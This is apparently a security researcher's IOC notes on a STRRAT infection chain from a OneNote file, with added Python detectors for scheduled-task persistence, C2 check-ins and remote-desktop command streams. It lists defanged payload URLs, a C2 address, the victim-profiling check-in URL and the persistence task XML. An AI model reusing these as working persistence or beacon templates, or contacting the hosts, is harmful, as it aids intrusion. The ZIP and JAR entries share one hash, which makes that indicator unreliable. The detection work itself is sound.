2023-04-05-IOCs-for-STRRAT-activity.txt
2023-04-05 (WEDNESDAY): ONENOTE FILE DISTRIBUTES STRRAT MALWARE, INFECTION LEADS TO RDP ACTIVITY
REFERENCE:
- https://twitter.com/Unit42_Intel/status/1644062757891854344
NOTES:
- This malicious OneNote file was likely sent via email, but we cannot yet confirm.
- In this infection, someone searched through the victim's Documents folder using STRRAT's built-in remote desktop (RDP) function, which is carried over the STRRAT C2 channel (see the REMOTEDESKTOP and RDPCLICK commands below) rather than over Microsoft's Remote Desktop Protocol on TCP port 3389.
- We could see the attacker opening and checking files from the victim's desktop.
INFECTION CHAIN:
- OneNote file --> embedded .vbe file --> traffic for .jar --> STRRAT .jar --> STRRAT C2 with RDP
ONENOTE FILE:
- SHA256 hash: 0008069a7d4f9e1539473085c723edd7c647dc7982ae536a3ee7de2bfc24471e
- File size: 7,820,392 bytes
- File name: Invoice-#GD59840.one
- File description: Example of malicious OneNote file with embedded VB script
EMBEDDED VBE FILE:
- SHA256 hash: d22c86bd4512b14e3d0e8cd5a78911795461f3f793c7b18dd1a31362eb7e7837
- File size: 509,306 bytes
- File name: ..vbe
- File description: encoded VBScript (.vbe) file embedded in the above OneNote file
TRAFFIC GENERATED BY ABOVE VBE FILE:
- For a Java Runtime Environment (JRE), if the victim host doesn't already have one: hxxps://www.paradisodomenico[.]it/Oracle/Oracle_64.zip
- For Java Archive (.jar) file: hxxps://www.paradisodomenico[.]it/Oracle/auz.zip
ZIP ARCHIVE CONTAINING STRRAT JAR FILE:
- SHA256 hash: b69b56937410a11e071ff03e8cc329345e9ca0c06a3445da35a66045b70cde7c
- File size: 181,078 bytes
- File location: hxxps://www.paradisodomenico[.]it/Oracle/auz.zip
- File location: C:\Users\[username]\AppData\Local\Temp\[random characters]\[random characters].zip
- File description: Retrieved by VBE file, zip archive containing .jar file for STRRAT
STRRAT JAR FILE:
- SHA256 hash: b69b56937410a11e071ff03e8cc329345e9ca0c06a3445da35a66045b70cde7c
- File size: 181,078 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\[random characters]\azupdate\auz.jar
- File location: C:\Users\[username]\AppData\Roaming\[random hex characters]\[random hex characters].log
- File description: Java archive (.jar) file extracted from the above .zip archive
EXAMPLE OF SCHEDULED TASK RUN METHOD FOR PERSISTENCE:
<Exec>
<Command>"C:\Users\user1\AppData\Roaming\java\bin\javaw.exe"</Command>
<Arguments>-jar "C:\Users\user1\AppData\Roaming\be5af5\be5af53d095c76592c78c5d2eb0519e0.log"</Arguments>
</Exec>
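The task above is the whole persistence story: a user-writable JRE (javaw.exe under AppData\Roaming\java) launching a .jar that has been renamed to a .log extension under AppData\Roaming. The following Python is an added example, not code from the original write-up, that checks exported Task Scheduler XML for exactly that pattern. The two task definitions embedded in it are constructed: one mirrors the persistence seen in this infection, the other is a benign Java task installed under Program Files. Real exports are UTF-16 with an XML declaration; read those as bytes before calling assess_task.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML lives in this namespace; every element tag is prefixed with it.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed sample mirroring the STRRAT scheduled task seen in this infection.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\user1\AppData\Roaming\java\bin\javaw.exe"</Command>
      <Arguments>-jar "C:\Users\user1\AppData\Roaming\be5af5\be5af53d095c76592c78c5d2eb0519e0.log"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign control: system-installed JRE running a properly named .jar.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\Java\jre1.8.0_271\bin\javaw.exe"</Command>
      <Arguments>-jar "C:\Program Files\Vendor\tool.jar"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Captures the -jar target whether or not it is quoted.
JAR_ARG = re.compile(r'-jar\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def extract_exec_actions(task_xml):
    """Yield (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    for exec_el in root.iter(TASK_NS + "Exec"):
        cmd = exec_el.findtext(TASK_NS + "Command", default="").strip().strip('"')
        args = exec_el.findtext(TASK_NS + "Arguments", default="")
        yield cmd, args


def assess_task(task_xml):
    """Return a list of findings for Java launcher tasks that look like STRRAT persistence."""
    findings = []
    for cmd, args in extract_exec_actions(task_xml):
        exe = cmd.rsplit("\\", 1)[-1].lower()
        if exe not in ("javaw.exe", "java.exe"):
            continue
        m = JAR_ARG.search(args)
        if not m:
            continue
        jar = m.group(1) or m.group(2)
        reasons = []
        if "\\appdata\\" in cmd.lower():
            reasons.append("java runtime launched from user AppData rather than a system install")
        if not jar.lower().endswith(".jar"):
            reasons.append("-jar target has a non-.jar extension (%s)" % jar.rsplit(".", 1)[-1])
        if "\\appdata\\roaming\\" in jar.lower():
            reasons.append("payload stored under AppData\\Roaming")
        if reasons:
            findings.append({"command": cmd, "jar": jar, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, xml in (("sample", SAMPLE_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, assess_task(xml))
```

On a live host the same XML is available from `Get-ScheduledTask | Export-ScheduledTask`, and the three reasons are deliberately independent: a renamed .jar alone, or a JRE dropped into AppData alone, is worth a look even when the other two signals are absent.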
ADDITIONAL FILE FOUND ON THE INFECTED WINDOWS HOST:
- SHA256 hash: 4185c0885eb84c0a4d04ec757fdcc1220729ba8733013e0a93f1f31da5c565f9
- File size: 2,042,368 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\[random characters]\[random characters]
- File description: 32-bit Windows EXE file
- Note 1: This is in a different directory than the zipped .jar file was originally saved to.
- Note 2: Not sure what this file is used for, or if it came from HTTPS traffic to www.paradisodomenico[.]it like the .jar file.
TRAFFIC GENERATED BY STRRAT JAR FILE:
- DNS queries for adrenalinecyber[.]com (response: No such name)
- For location of victim: hxxps://www.geoplugin[.]net/json.gp?ip=
- Sending victim info (User-Agent: Java/1.8.0_271): hxxps://www.paradisodomenico[.]it/wp-content//api.php?action=get_anytask&ip=&computer_name=DESKTOP-USER1PC&user_name=user1&mac=01-23-45-67-89-AB&country_code=us&is_admin=normal&Def=ON&hwid=0123456789abcdef0123456789abcdef
- This infection generated periodic attempts to contact adrenalinecyber[.]com and HTTPS traffic to www.paradisodomenico[.]it, repeating every few minutes.
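The check-in URL above carries the victim profile in the query string (computer_name, user_name, mac, hwid, is_admin, Def) and is requested with a Java/1.8 User-Agent against a WordPress path with a doubled slash. The following Python is an added example, not part of the original notes, that pulls those fields out of proxy log lines and flags the Java-User-Agent geoplugin lookup as a supporting indicator. The log lines are constructed for the example (client, method, URL, User-Agent separated by spaces); only the second one reproduces the check-in shape documented above, with the same placeholder values.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines: "<client> <method> <url> <user-agent>". Not from the original capture.
SAMPLE_PROXY_LOG = [
    "10.0.0.15 GET https://www.paradisodomenico.it/wp-content/themes/style.css Mozilla/5.0 (Windows NT 10.0)",
    "10.0.0.15 GET https://www.paradisodomenico.it/wp-content//api.php?action=get_anytask&ip=&computer_name=DESKTOP-USER1PC&user_name=user1&mac=01-23-45-67-89-AB&country_code=us&is_admin=normal&Def=ON&hwid=0123456789abcdef0123456789abcdef Java/1.8.0_271",
    "10.0.0.22 GET https://www.geoplugin.net/json.gp?ip= Java/1.8.0_271",
    "10.0.0.22 GET https://repo.example.com/maven2/org/apache/log4j/maven-metadata.xml Java/11.0.2",
]

# Query parameters that together identify the STRRAT get_anytask check-in.
STRRAT_CHECKIN_KEYS = {"action", "computer_name", "user_name", "mac", "hwid", "is_admin"}
GEO_HOSTS = {"www.geoplugin.net", "geoplugin.net"}


def split_log_line(line):
    """Split a constructed log line into (client, method, url, user_agent)."""
    client, method, url, ua = line.split(" ", 3)
    return client, method, url, ua


def parse_strrat_checkin(url):
    """Return the victim fields if url is a STRRAT get_anytask check-in, else None."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)  # ip= is empty, keep it
    if qs.get("action") != ["get_anytask"]:
        return None
    if not STRRAT_CHECKIN_KEYS.issubset(qs):
        return None
    return {key: values[0] for key, values in qs.items()}


def find_strrat_beacons(log_lines):
    """Return one record per check-in, with the victim profile and the secondary signals."""
    hits = []
    for line in log_lines:
        client, _method, url, ua = split_log_line(line)
        fields = parse_strrat_checkin(url)
        if fields is None:
            continue
        parts = urlsplit(url)
        hits.append({
            "client": client,
            "host": parts.hostname,
            "path": parts.path,
            "java_ua": ua.startswith("Java/"),        # JRE default UA, odd for a WordPress site
            "double_slash_path": "//" in parts.path,  # the //api.php quirk seen above
            "victim": fields,
        })
    return hits


def find_java_geolookups(log_lines):
    """Return clients that queried geoplugin with a Java User-Agent (STRRAT's location lookup)."""
    return [
        client
        for client, _m, url, ua in map(split_log_line, log_lines)
        if urlsplit(url).hostname in GEO_HOSTS and ua.startswith("Java/")
    ]


if __name__ == "__main__":
    for hit in find_strrat_beacons(SAMPLE_PROXY_LOG):
        print(hit["client"], hit["host"], hit["path"], hit["victim"]["computer_name"], hit["victim"]["hwid"])
    print("geo lookups from:", find_java_geolookups(SAMPLE_PROXY_LOG))
```

The hwid and mac values are what let you tie repeated check-ins from one host together across IP changes; the geoplugin lookup on its own is common enough in legitimate Java software that it is reported separately rather than folded into the beacon verdict.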
STRRAT TRAFFIC:
- 185.91.69[.]172 port 1234 - checkmybones.dns[.]army - TCP traffic
NOTE: Text-based command strings seen from the STRRAT C2 server at 185.91.69[.]172:1234 include:
HASPLUGIN
HEARTBEAT~
HEARTBEAT~
REMOTEDESKTOP
QUITREMOTEDESKTOP
HEARTBEAT~
REMOTEDESKTOP
RDPCLICK~18~1059
RDPCLICK~414~1058
RDPCLICK~722~572
RDPCLICK~917~625
RDPCLICK~917~625
HEARTBEAT~
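The command strings above are tilde-delimited: a verb, then optional arguments (RDPCLICK carries an x and a y screen coordinate). The following Python is an added example, not part of the original notes, that walks such a command stream and reconstructs the operator's remote desktop sessions, which is how the "attacker opening and checking files" observation above can be pulled out of a capture automatically. The stream it parses is constructed from the listing above, one command per line, which is an assumption about how the commands were extracted from the TCP session; a session still open when the capture ends is kept rather than dropped.

```python
# Constructed C2 command stream: the commands listed above, one per line as pulled from
# the TCP session on port 1234. The one-command-per-line layout is an assumption.
SAMPLE_C2_STREAM = """HASPLUGIN
HEARTBEAT~
HEARTBEAT~
REMOTEDESKTOP
QUITREMOTEDESKTOP
HEARTBEAT~
REMOTEDESKTOP
RDPCLICK~18~1059
RDPCLICK~414~1058
RDPCLICK~722~572
RDPCLICK~917~625
RDPCLICK~917~625
HEARTBEAT~
"""


def parse_command(line):
    """Split 'VERB~arg~arg' into (verb, [args]); a trailing '~' yields no argument."""
    fields = line.rstrip("\r\n").split("~")
    return fields[0], [a for a in fields[1:] if a != ""]


def summarize_c2(stream):
    """Count heartbeats and rebuild REMOTEDESKTOP sessions with the clicks sent inside each."""
    summary = {"heartbeats": 0, "sessions": [], "orphan_clicks": 0, "other": [], "hands_on": False}
    current = None  # the remote desktop session currently open, if any
    for line in stream.splitlines():
        if not line.strip():
            continue
        verb, args = parse_command(line)
        if verb == "HEARTBEAT":
            summary["heartbeats"] += 1
        elif verb == "REMOTEDESKTOP":
            if current is not None:          # server restarted the session without quitting
                summary["sessions"].append(current)
            current = {"clicks": []}
        elif verb == "QUITREMOTEDESKTOP":
            if current is not None:
                summary["sessions"].append(current)
                current = None
        elif verb == "RDPCLICK":
            x, y = (int(a) for a in args[:2])
            if current is None:              # click with no session open: keep count, don't lose it
                summary["orphan_clicks"] += 1
            else:
                current["clicks"].append((x, y))
        else:
            summary["other"].append(verb)
    if current is not None:                  # capture ended with the session still open
        summary["sessions"].append(current)
    summary["hands_on"] = any(s["clicks"] for s in summary["sessions"])
    return summary


if __name__ == "__main__":
    s = summarize_c2(SAMPLE_C2_STREAM)
    print("heartbeats:", s["heartbeats"], "sessions:", len(s["sessions"]), "hands-on operator:", s["hands_on"])
    for i, session in enumerate(s["sessions"], 1):
        print("session", i, "clicks:", session["clicks"])
```

Any RDPCLICK inside a session is the useful signal: heartbeats and even a REMOTEDESKTOP that is immediately quit can be automated, but a sequence of distinct screen coordinates means a person was driving the victim's desktop.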